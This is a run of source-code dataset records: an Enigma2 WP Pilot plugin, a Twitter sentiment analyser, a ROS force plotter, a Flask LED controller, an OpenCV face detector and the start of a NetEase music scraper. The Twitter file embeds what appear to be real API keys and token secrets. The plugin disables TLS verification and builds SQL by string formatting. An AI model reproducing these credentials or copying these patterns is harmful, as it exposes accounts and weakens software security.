len(sys.argv) >=5:\n file_name = sys.argv[1]\n #print 'filename' , file_name\n #print path + file_name\n data['login'] = sys.argv[2]\n #print 'username' , data['login']\n data['password'] = sys.argv[3]\n #print 'password' , data['password']\n streamlinkURL = 'http%%3a//127.0.0.1%%3a%s/' % sys.argv[4]\n frameWork = sys.argv[5]\n #print frameWork\n _generate_E2bouquet()\n elif len(sys.argv) == 2 and sys.argv[1] == 'checkLogin':\n if _login():\n print('Zalogowano poprawnie\\n\\n')\n else:\n print('Nieudane logowanie. Sprawdź login i hasło w ustawieniach wtyczki.\\n\\n')\n\n# ORGINAL code for reference plugin.video.pilot.wp-0.1.3\n\"\"\"\nimport sys\nimport os\nfrom urlparse import parse_qsl\nimport urllib\nimport emukodi.xbmc as xbmc\nimport emukodi.xbmcgui as xbmcgui\nimport emukodi.xbmcplugin as xbmcplugin\nimport emukodi.xbmcaddon as xbmcaddon\nimport emukodi.xbmcvfs as xbmcvfs\n\n#constants\nbase_url = '' #sys.argv[0]\naddon_handle = 0 #int(sys.argv[1])\nparams = {} #dict(parse_qsl(sys.argv[2][1:]))\naddon = xbmcaddon.Addon(id='plugin.video.pilot.wp')\n\nlogin_url = 'https://pilot.wp.pl/api/v1/user_auth/login'\nmain_url = 'https://pilot.wp.pl/api/v1/channels/list?device=androidtv'\nvideo_url = 'https://pilot.wp.pl/api/v1/channel/'\nclose_stream_url = 'https://pilot.wp.pl/api/v1/channels/close'\n\nheaders = {\n 'user-agent': 'ExoMedia 4.3.0 (43000) / Android 8.0.0 / foster_e',\n 'accept': 'application/json',\n 'x-version': 'pl.videostar|3.25.0|Android|26|foster_e',\n 'content-type': 'application/json; charset=UTF-8'\n}\n\nusername = addon.getSetting('username')\npassword = addon.getSetting('password')\nfile_name = addon.getSetting('fname')\npath = addon.getSetting('path')\n#sessionid = params.get('sessionid', '')\n\n#addonInfo = xbmcaddon.Addon().getAddonInfo\ndataPath = '/usr/lib/enigma2/python/Plugins/Extensions/StreamlinkConfig' #xbmc.translatePath(addonInfo('profile')).decode('utf-8')\ncacheFile = os.path.join(dataPath, 'WPConfigCache.db')\n\n\ndef build_url(query):\n return base_url + '?' + urllib.urlencode(query)\n\ndef add_item(name, image, is_folder, is_playble, payload, plot=''):\n list_item = xbmcgui.ListItem(label=name)\n\n if is_playble:\n list_item.setProperty(\"IsPlayable\", 'true')\n else:\n list_item.setProperty(\"IsPlayable\", 'false')\n\n list_item.setInfo(type='video', infoLabels={\n 'title': name, 'sorttitle': name, 'plot': plot})\n list_item.setArt({'thumb': image, 'poster': image, 'banner': image})\n xbmcplugin.addDirectoryItem(\n handle=addon_handle,\n url=build_url(payload),\n listitem=list_item,\n isFolder=is_folder\n )\n\n\ndef saveToDB(table_name, value):\n import sqlite3\n import os\n if os.path.exists(cacheFile):\n os.remove(cacheFile)\n else:\n print('File does not exists')\n conn = sqlite3.connect(cacheFile, detect_types=sqlite3.PARSE_DECLTYPES,\n cached_statements=20000)\n c = conn.cursor()\n c.execute('CREATE TABLE IF NOT EXISTS Cache(%s TEXT)' % table_name)\n c.execute(\"INSERT INTO Cache('%s') VALUES ('%s')\" % (table_name, value))\n conn.commit()\n c.close()\n\ndef readFromDB():\n import sqlite3\n conn = sqlite3.connect(cacheFile, detect_types=sqlite3.PARSE_DECLTYPES,\n cached_statements=20000)\n c = conn.cursor()\n c.execute(\"SELECT * FROM Cache\")\n for row in c:\n if row:\n c.close()\n return row[0]\n\ndef cookiesToString(cookies):\n try:\n return \"; \".join([str(x) + \"=\" + str(y) for x, y in cookies.get_dict().items()])\n except Exception as e:\n print (e)\n return ''\n\ndef login():\n if len(password) > 0 and len(username) > 0:\n data = {'device': 'AndroidTV', 'login': username, 'password': password}\n\n response = requests.post(\n login_url,\n json=data,\n verify=False,\n headers=headers\n )\n\n meta = response.json().get('_meta', None)\n if meta is not None:\n if meta.get('error', {}).get('name', None) is not None:\n xbmcgui.Dialog().notification('Nieudane logowanie', 'Sprawdź login i hasło w ustawieniach wtyczki.',\n xbmcgui.NOTIFICATION_ERROR, 5000)\n return ''\n\n saveToDB('wppilot_cache', cookiesToString(response.cookies))\n return cookiesToString(response.cookies)\n\n else:\n xbmcgui.Dialog().notification('Nieudane logowanie', 'Sprawdź login i hasło w ustawieniach wtyczki.',\n xbmcgui.NOTIFICATION_ERROR, 5000)\n return ''\n\ndef stream_url(video_id, retry=False):\n cookies = readFromDB()\n if not sessionid or len(video_id) == 0:\n return ''\n\n url = video_url + video_id\n data = {'format_id': '2', 'device_type': 'android'}\n\n headers.update({'Cookie': cookies})\n response = requests.get(\n url,\n params=data,\n verify=False,\n headers=headers,\n ).json()\n\n meta = response.get('_meta', None)\n if meta is not None:\n token = meta.get('error', {}).get('info', {}).get('stream_token', None)\n if token is not None:\n json = {'channelId': video_id, 't': token}\n response = requests.post(\n close_stream_url,\n json=json,\n verify=False,\n headers=headers\n ).json()\n if response.get('data', {}).get('status', '') == 'ok' and not retry:\n return stream_url(video_id, True)\n else:\n return\n\n if 'hls@live:abr' in response[u'data'][u'stream_channel'][u'streams'][0][u'type']:\n return response[u'data'][u'stream_channel'][u'streams'][0][u'url'][0]\n else:\n return response[u'data'][u'stream_channel'][u'streams'][1][u'url'][0]\n\n\ndef play(id):\n manifest = stream_url(id)\n\n if len(manifest) == 0:\n return\n manifest = manifest + '|user-agent=' + headers['user-agent']\n play_item = xbmcgui.ListItem(path=manifest)\n xbmcplugin.setResolvedUrl(addon_handle, True, listitem=play_item) \n \ndef channels():\n if not sessionid:\n return []\n cookies = readFromDB()\n headers.update({'Cookie': cookies})\n response = requests.get(\n main_url,\n verify=False,\n headers=headers,\n ).json()\n\n return response.get('data', [])\n\ndef generate_m3u():\n if not sessionid:\n return\n\n if file_name == '' or path == '':\n xbmcgui.Dialog().notification('WP Pilot', 'Ustaw nazwe pliku oraz katalog docelowy.',\n xbmcgui.NOTIFICATION_ERROR)\n return\n\n xbmcgui.Dialog().notification('WP Pilot', 'Generuje liste M3U.',\n xbmcgui.NOTIFICATION_INFO)\n data = '#EXTM3U\\n'\n\n for item in channels():\n if item.get('access_status', '') != 'unsubscribed':\n id = item.get('id', None)\n title = item.get('name', '')\n data += '#EXTINF:-1,%s\\nplugin://plugin.video.pilot.wp?action=PLAY&channel=%s\\n' % (\n title, id)\n\n f = xbmcvfs.File(path + file_name, 'w')\n f.write(data.encode('utf-8'))\n f.close()\n\n xbmcgui.Dialog().notification('WP Pilot', 'Wygenerowano liste M3U.', xbmcgui.NOTIFICATION_INFO)\n\ndef route():\n global sessionid\n if not sessionid:\n sessionid = login()\n\n mode = params.get('mode', None)\n action = params.get('action', '')\n\n if action == 'BUILD_M3U':\n generate_m3u()\n elif action == 'PLAY':\n id = params.get('channel', '')\n play(id)\n else:\n if not mode:\n home()\n elif mode == 'play':\n id = params.get('id', '')\n play(id)\n\n\nif __name__ == '__main__':\n route() \n\"\"\"\n", "sub_path": "StreamLink/usr/lib/enigma2/python/Plugins/Extensions/StreamlinkConfig/plugins/wpBouquet.py", "file_name": "wpBouquet.py", "file_ext": "py", "file_size_in_byte": 11822, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "wpConfig.getCookie", "line_number": 27, "usage_type": "call"}, {"api_name": "wpConfig.headers.update", "line_number": 36, "usage_type": "call"}, {"api_name": "wpConfig.headers", "line_number": 36, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 37, "usage_type": "call"}, {"api_name": "wpConfig.params", "line_number": 38, "usage_type": "name"}, {"api_name": "wpConfig.headers", "line_number": 40, "usage_type": "name"}, {"api_name": "wpConfig.data", "line_number": 51, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 51, "usage_type": "name"}, {"api_name": "channelsMappings.name2service4wpDict.get", "line_number": 60, "usage_type": "call"}, {"api_name": "channelsMappings.name2service4wpDict", "line_number": 60, "usage_type": "name"}, {"api_name": "channelsMappings.name2serviceDict.get", "line_number": 62, "usage_type": "call"}, {"api_name": "channelsMappings.name2serviceDict", "line_number": 62, "usage_type": "name"}, {"api_name": "channelsMappings.name2nameDict.get", "line_number": 62, "usage_type": "call"}, {"api_name": "channelsMappings.name2nameDict", "line_number": 62, "usage_type": "name"}, {"api_name": "wpConfig.data", "line_number": 70, "usage_type": "name"}, {"api_name": "wpConfig.params", "line_number": 70, "usage_type": "name"}, {"api_name": "wpConfig.data", "line_number": 71, "usage_type": "name"}, {"api_name": "wpConfig.data.encode", "line_number": 74, "usage_type": "call"}, {"api_name": "wpConfig.data", "line_number": 74, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 96, "usage_type": "call"}, {"api_name": "wpConfig.params", "line_number": 97, "usage_type": "name"}, {"api_name": "wpConfig.data", "line_number": 98, "usage_type": "name"}, {"api_name": "wpConfig.headers", "line_number": 100, "usage_type": "name"}, {"api_name": "wpConfig.saveCookie", "line_number": 108, "usage_type": "call"}, {"api_name": "wpConfig.getCookie", "line_number": 109, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 112, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 113, "usage_type": "attribute"}, {"api_name": "wpConfig.data", "line_number": 116, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 116, "usage_type": "attribute"}, {"api_name": "wpConfig.data", "line_number": 118, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 118, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 120, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 121, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 124, "usage_type": "attribute"}]} +{"seq_id": "266974013", "text": "import re\nimport tweepy\nimport sys\nfrom tweepy import OAuthHandler\nfrom textblob import TextBlob\nimport os\n \nclass TwitterClient(object):\n '''\n Generic Twitter Class for sentiment analysis.\n Code modified from https://www.geeksforgeeks.org/twitter-sentiment-analysis-using-python/\n '''\n def __init__(self):\n '''\n Class constructor or initialization method.\n '''\n # keys and tokens from the Twitter Dev Console\n api_key = 'mabJ5Hs9iaLL3oUnEGJmeGURu'\n api_secret = 'TKxoibLLCDtp8hiXOaLy60DsvPsZePga5Ig4qUw62xP5QuZxdS'\n access_token = '985548524518608896-47tQqjE4L3u1FC8k53AC7TpOmXCbDnQ'\n access_token_secret = 'WQUEYIBb07MoJVVjqGx6DtV5nle8IdIDTW0QsTXUQ7aNa'\n\n # TODO: Change the above to use environment variables\n # api_key = os.environ['TWITTER_API_KEY']\n # api_secret = os.environ['TWITTER_API_SECRET']\n # access_token = os.environ['TWITTER_ACCESS_TOKEN']\n # access_token_secret = os.environ['TWITTER_ACCESS_SECRET']\n \n # attempt authentication\n try:\n # create OAuthHandler object\n self.auth = OAuthHandler(api_key, api_secret)\n # set access token and secret\n self.auth.set_access_token(access_token, access_token_secret)\n # create tweepy API object to fetch tweets\n self.api = tweepy.API(self.auth)\n except:\n print(\"Error: Authentication Failed\")\n \n def clean_tweet(self, tweet):\n '''\n Utility function to clean tweet text by removing links, special characters\n using simple regex statements.\n '''\n return ' '.join(re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \" \", unicode(tweet)).split())\n \n def get_tweet_sentiment(self, tweet):\n '''\n Utility function to classify sentiment of passed tweet\n using textblob's sentiment method\n '''\n # create TextBlob object of passed tweet text\n analysis = TextBlob(self.clean_tweet(tweet))\n # set sentiment\n if analysis.sentiment.polarity > 0:\n return 'positive'\n elif analysis.sentiment.polarity == 0:\n return 'neutral'\n else:\n return 'negative'\n \n def get_tweets(self, query, count = 10):\n '''\n Main function to fetch tweets and parse them.\n '''\n # empty list to store parsed tweets\n tweets = []\n \n try:\n # call twitter api to fetch tweets\n fetched_tweets = self.api.search(q = query, count = count)\n \n # parsing tweets one by one\n for tweet in fetched_tweets:\n # empty dictionary to store required params of a tweet\n parsed_tweet = {}\n \n # saving text of tweet\n parsed_tweet['text'] = tweet.text\n # saving sentiment of tweet\n parsed_tweet['sentiment'] = self.get_tweet_sentiment(tweet.text)\n \n # appending parsed tweet to tweets list\n if tweet.retweet_count > 0:\n # if tweet has retweets, ensure that it is appended only once\n if parsed_tweet not in tweets:\n tweets.append(parsed_tweet)\n else:\n tweets.append(parsed_tweet)\n \n # return parsed tweets\n return tweets\n \n except tweepy.TweepError as e:\n # print error (if any)\n print(\"Error : \" + str(e))\n\n def get_company_sentiment_descriptor(self, company_name):\n '''\n @returns: Tuple - (sentiment_val, descriptor)\n - sentiment_val is the sentiment score\n - descriptor is the description given this sentiment score\n '''\n tweets = self.get_tweets(company_name, count=100)\n tweet_sentiments = [self.get_tweet_sentiment(x) for x in tweets]\n\n # negative tweets carry weight -2, positive carry weight +1, neutral carry weight +0\n val_map = {'negative':-2, 'positive':1, 'neutral':0}\n sentiment_val_arr = [val_map[x] for x in tweet_sentiments]\n sentiment_val = sum(sentiment_val_arr)\n \n # print(\"TWEETS: \", tweets)\n print(\"SENTIMENT ARRAY: \", sentiment_val_arr)\n\n try:\n if sentiment_val < 0:\n neg_tweet_example = str(tweets[sentiment_val_arr.index(-2)]['text'].encode(sys.stdout.encoding, errors='replace'))\n descriptor = 'Twitter sentiment analysis shows that there is a substantial number of negative tweets surrounding ' \\\n + company_name \\\n + '. This may signal a controversial public presence, which should be taken into account when performing future research.' \\\n + 'An example of a negative tweet is shown below:\\n\\n' \\\n + neg_tweet_example\n else:\n pos_tweet_example = str(tweets[sentiment_val_arr.index(1)]['text'].encode(sys.stdout.encoding, errors='replace'))\n descriptor = 'Twitter sentiment analysis shows that tweets surrounding ' \\\n + company_name \\\n + ' are largely positive. ' \\\n + 'This may signal a company with a strong public presence and good public relations, which should be taken into account when performing future research.' \\\n + 'An example of a positive tweet is shown below: \\n \\n' \\\n + pos_tweet_example\n except:\n descriptor = \"No description available...\"\n\n return (sentiment_val, descriptor)\n\n \ncompany_name = \"Tesla\"\napi = TwitterClient()\ncompany_sentiment = api.get_company_sentiment_descriptor(company_name)\nprint(company_sentiment)\n\n\n\n", "sub_path": "src/app/get_sentiment.py", "file_name": "get_sentiment.py", "file_ext": "py", "file_size_in_byte": 5688, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "tweepy.OAuthHandler", "line_number": 32, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 36, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 45, "usage_type": "call"}, {"api_name": "textblob.TextBlob", "line_number": 53, "usage_type": "call"}, {"api_name": "tweepy.TweepError", "line_number": 94, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 117, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 124, "usage_type": "attribute"}]} +{"seq_id": "250963598", "text": "import matplotlib.pyplot as plt\nimport rospy\nimport numpy as np\nfrom matplotlib.animation import FuncAnimation\n\nfrom geometry_msgs.msg import WrenchStamped\nfrom std_msgs.msg import String, Float64, Float32\n\nfrom my_message.msg import GraphData\n\namp =1 \n\nf = 1000\nfs = 20000\nT = 1/f\nTs = 1/fs\n\n\ncontinous = True\n\n#y = [amp.np.sin(2*np.pi*f*(i/fs)) for i in x]\n\nclass Visualiser:\n def __init__(self):\n self.fig, self.ax = plt.subplots()\n self.iFrame = 0\n self.sum = 0.0\n self.ln2, = plt.plot([],[], 'g')\n\n self.ln, = plt.plot([], [], 'r')\n\n self.x_data, self.y_data = [0] , [0]\n self.y_desired_data, self.x_desired_data = [0] , [0] \n\n self.count=0\n\n \n def plot_init(self, dt = Ts):\n self.dt = dt\n self.maxt = 5000\n self.ax.set_xlim(0, self.maxt)\n self.ax.set_ylim(-20, 20)\n return self.ln, self.ln2\n \n\n def odom_callback(self, msg):\n self.force_data = msg.data\n self.y_data.append(-self.force_data)\n #print(self.force_data)\n x_index = len(self.x_data)\n \n x_index2 = 2500+x_index\n \n if x_index <2500 or np.sin((x_index2/fs)*2*np.pi*f/100)*6<0:\n self.y_desired_data.append(0)\n else:\n self.y_desired_data.append(-np.sin((x_index2/fs)*2*np.pi*f/100)*6)\n\n self.x_desired_data.append(x_index2+1)\n self.x_data.append(x_index+1)\n \n if x_index>2500:\n dif = self.y_data[x_index] - self.y_desired_data[x_index-2500]\n else:\n dif=0\n squared_dif = dif**2\n\n self.sum = self.sum + squared_dif\n #if x_index!=0:\n # MSE = self.sum/x_index\n #print(MSE)\n #print(\"actual data:\"+ str(self.y_data[x_index]))\n #print(\"desired data:\"+ str(self.y_desired_data[x_index]))\n #pub = rospy.Publisher('force_data', GraphData, queue_size=1)\n #msg2 = GraphData()\n #msg2.ms_error = round(MSE,3)\n #msg2.y_desired = self.y_desired_data[x_index]\n #msg2.y_sensed = self.y_data[x_index]\n #msg2.x_value = x_index/500\n #pub2.publish(msg)\n\n\n \n def update_plot(self, frame):\n \n self.count+=1\n lastt=self.x_data[-1]\n if continous:\n if lastt >self.x_data[0]+self.maxt/2:\n self.ax.set_xlim(lastt - self.maxt/2,lastt + self.maxt/2)\n t = self.x_data[-1] +self.dt\n self.x_data.append(t)\n self.y_data.append(-self.force_data)\n\n\n t2 = self.x_desired_data[-1]+self.dt\n if t < 2500 or np.sin((t2/fs)*2*np.pi*f/100)*6<0:\n self.y_desired_data.append(0)\n else:\n self.y_desired_data.append(-np.sin((t2/fs)*2*np.pi*f/100)*6)\n self.x_desired_data.append(t2)\n \n self.ln2.set_data(self.x_desired_data, self.y_desired_data)\n\n\n return self.ln , self.ln2\n\n\nrospy.init_node('force_visual_node')\nvis = Visualiser()\nsub = rospy.Subscriber('/chatter', Float32, vis.odom_callback)\n\n#ani = FuncAnimation(vis.fig, vis.update_plot, interval= 1)\n\nani = FuncAnimation(vis.fig, vis.update_plot, init_func=vis.plot_init , interval= 1)\nplt.show(block=True) ", "sub_path": "my_message/src/lineFollow.py", "file_name": "lineFollow.py", "file_ext": "py", "file_size_in_byte": 3197, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.subplots", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "numpy.sin", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 97, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 100, "usage_type": "attribute"}, {"api_name": "rospy.init_node", "line_number": 109, "usage_type": "call"}, {"api_name": "rospy.Subscriber", "line_number": 111, "usage_type": "call"}, {"api_name": "std_msgs.msg.Float32", "line_number": 111, "usage_type": "argument"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}]} +{"seq_id": "492784953", "text": "from flask import Flask, render_template, request, jsonify\nfrom multiprocessing import Queue\n\nfrom core.devices.input_device import InputDevice\nfrom core.devices.output_device import switch_animation_message, update_param_message\nfrom core.utilities import round_to_exponent\nimport time\napp = Flask(__name__)\n\n# Simplest way I know share data between functions in flask is to make a data dict\napp.data = {\n \"output_devices\": {}, # key: device name, value: device\n \"fft_in_queue\": None\n}\n\ndef run(host, port, output_devices, fft_in_queue):\n \"\"\"\n Call this function to start the server\n \"\"\"\n \n app.data[\"output_devices\"] = {device.name: device for device in output_devices} \n app.data[\"fft_in_queue\"] = fft_in_queue\n app.run(host=host, port=port)\n\n@app.route('/')\ndef index():\n \"\"\"\n Main page of controller\n \"\"\"\n\n # Data for template rendering\n devices = [device_render_data(device) for device in app.data[\"output_devices\"].values()]\n\n return render_template('index.html', \n devices=devices, \n fft_recorder=app.data[\"fft_in_queue\"] is not None\n )\n\n@app.route('/switch_animation', methods=['POST'])\ndef switch_animation():\n \"\"\"\n Switches an animation\n \"\"\"\n\n # Check format of POST data\n if \"device_name\" not in request.form:\n # TODO: log error\n return \"error: device name not specified\"\n device_name = request.form[\"device_name\"]\n\n if request.form[\"device_name\"] not in app.data[\"output_devices\"]:\n # TODO: log error\n return \"error: device name unknown\"\n device = app.data[\"output_devices\"][device_name]\n\n if \"new_animation\" not in request.form:\n # TODO: log error\n return \"error: new animation not defined\"\n new_animation_name = request.form[\"new_animation\"]\n\n # Send switch message and then wait until it has been processed\n device.in_queue.put(switch_animation_message(new_animation_name))\n animation_data = device.animation_queue.get()\n\n return jsonify({\"name\": device.name, \"animation\": animation_data})\n\n@app.route(\"/set_param\", methods=[\"POST\"])\ndef set_param():\n \"\"\"\n Sets a parameter\n \"\"\"\n if \"param_name\" not in request.form:\n return \"no param name\"\n param_name = request.form[\"param_name\"].strip()\n\n if \"param_value\" not in request.form:\n return \"no param value\"\n param_value = float(request.form[\"param_value\"])\n\n if \"device_name\" not in request.form:\n return \"no device name\"\n\n if request.form[\"device_name\"] not in app.data[\"output_devices\"]:\n return \"unknown device name\"\n\n device = app.data[\"output_devices\"][request.form[\"device_name\"]]\n device.in_queue.put(update_param_message(param_name, param_value))\n\n return \"done\"\n\ndef put_fft_in_queue(message):\n \"\"\"\n Puts an item in the fft queue if there is one\n \"\"\"\n if app.data[\"fft_in_queue\"] is None:\n return\n\n app.data[\"fft_in_queue\"].put(message)\n\n@app.route(\"/start_record\")\ndef start_record():\n put_fft_in_queue(\"start_record\")\n return \"done\"\n\n@app.route(\"/stop_record\")\ndef stop_record():\n put_fft_in_queue(\"stop_record\")\n return \"done\"\n\ndef device_render_data(device):\n # Request current animation data\n device.in_queue.put(switch_animation_message(\"\"))\n\n return {\n \"name\": device.name,\n \"possible_animations\": device.possible_animations().keys(),\n \"animation\": device.animation_queue.get()\n }", "sub_path": "core/app/app_server.py", "file_name": "app_server.py", "file_ext": "py", "file_size_in_byte": 3457, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 46, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 49, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "core.devices.output_device.switch_animation_message", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 72, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 86, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 86, "usage_type": "name"}, {"api_name": "core.devices.output_device.update_param_message", "line_number": 87, "usage_type": "call"}, {"api_name": "core.devices.output_device.switch_animation_message", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "638412738", "text": "import cv2\nimport numpy as np\nimport pkg_resources\n\nglobal_config = {\n 'VJ_cascade_path' : pkg_resources.resource_filename('boremeter', 'cv_haar_cascades/haarcascade_frontalface_default.xml'),\n 'cascade_params' : [1.15, 3],\n}\n\n\ndef get_faces_VJ(img, cascade):\n\n max_scale, min_neighbors = global_config['cascade_params']\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n return cascade.detectMultiScale(gray, max_scale, min_neighbors)\n\n\ndef filter_faces(bbs):\n\n return bbs\n\n\ndef check_faces(bbs):\n\n return bbs\n\n\ndef detect_faces(img, raw_detector='VJ'):\n\n raw_faces = np.array([])\n\n if raw_detector == 'VJ':\n detector = cv2.CascadeClassifier(global_config['VJ_cascade_path'])\n raw_faces = get_faces_VJ(img, detector)\n\n filtered_faces = filter_faces(raw_faces)\n checked_faces = check_faces(filtered_faces)\n\n return checked_faces\n\n\ndef detect_faces_on_video(video_file_path, detection_step=1, frames_limit=200):\n\n input_video = cv2.VideoCapture(video_file_path)\n\n cur_frame = 0 \n frames = {}\n\n ret = True\n\n while cur_frame < frames_limit and ret:\n ret, frame = input_video.read() \n\n frames[cur_frame] = [0,1]\n frames[cur_frame][0] = frame\n\n if cur_frame % detection_step == 0:\n frames[cur_frame][1] = detect_faces(frame)\n else:\n frames[cur_frame][1] = np.array([])\n\n cur_frame += 1\n return frames\n", "sub_path": "boremeter/detector.py", "file_name": "detector.py", "file_ext": "py", "file_size_in_byte": 1428, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pkg_resources.resource_filename", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.CascadeClassifier", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "183959824", "text": "# -*- coding: utf-8 -*-\nfrom urllib.parse import quote\nimport codecs\nimport json\nimport re\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom lxml import etree\nimport pymongo\nimport requests\nfrom wangyiyun.search_list.one_song_comment import song_comment\n\nclass Search():\n def __init__(self):\n self.browser = webdriver.Chrome()\n self.wait = WebDriverWait(self.browser, 10)\n self.client = pymongo.MongoClient('localhost', 27017)\n self.db = self.client['wangyiyun']\n self.comment = song_comment()\n self.base_url = 'https://music.163.com'\n self.url = 'https://music.163.com/#/search/m/?order=hot&cat=%E5%85%A8%E9%83%A8&limit=435&offset=435&s={}&type=1'\n\n def search(self):\n keys = input(\"Search Key:\")\n self.browser.get(self.url.format(quote(keys)))\n return self.browser\n\n def search_result(self):\n try:\n time.sleep(1.5)\n windows = self.browser.window_handles\n # 切换到当前最新打开的窗口\n self.browser.switch_to.window(windows[-1])\n f = self.wait.until(EC.presence_of_element_located((By.TAG_NAME, \"iframe\")))\n print(f)\n self.browser.switch_to.frame(f)\n time.sleep(1)\n doc = etree.HTML(self.browser.page_source)\n divs = doc.xpath(\"//div[@class='n-srchrst']/div[@class='srchsongst']/div\")\n for div in divs:\n link = self.base_url + div.xpath(\"./div[@class='td w0']//div[@class='text']/a/@href\")[0]\n self.comment.parse_comment(link)\n try:\n # if doc.xpath(\"//*[@class='zbtn znxt js-n-1548726589048 js-disabled']\"):\n # print(\"Page exhaustion ...\")\n # pass\n links = self.browser.find_elements_by_tag_name(\"a\")\n for link in links:\n if link.text == '下一页':\n link.click()\n return self.search_result()\n except StaleElementReferenceException:\n links = self.browser.find_elements_by_tag_name(\"a\")\n for link in links:\n if link.text == '下一页':\n link.click()\n return self.search_result()\n except Exception:\n print(\"Page exhaustion ...\")\n pass\n\n except Exception as e:\n print('Error',e.args)\n return self.search_result()\n\nif __name__ == '__main__':\n search = Search()\n search.search()\n search.search_result()\n\n", "sub_path": "search_list/search.py", "file_name": "search.py", "file_ext": "py", "file_size_in_byte": 2882, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 21, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 22, "usage_type": "call"}, {"api_name": 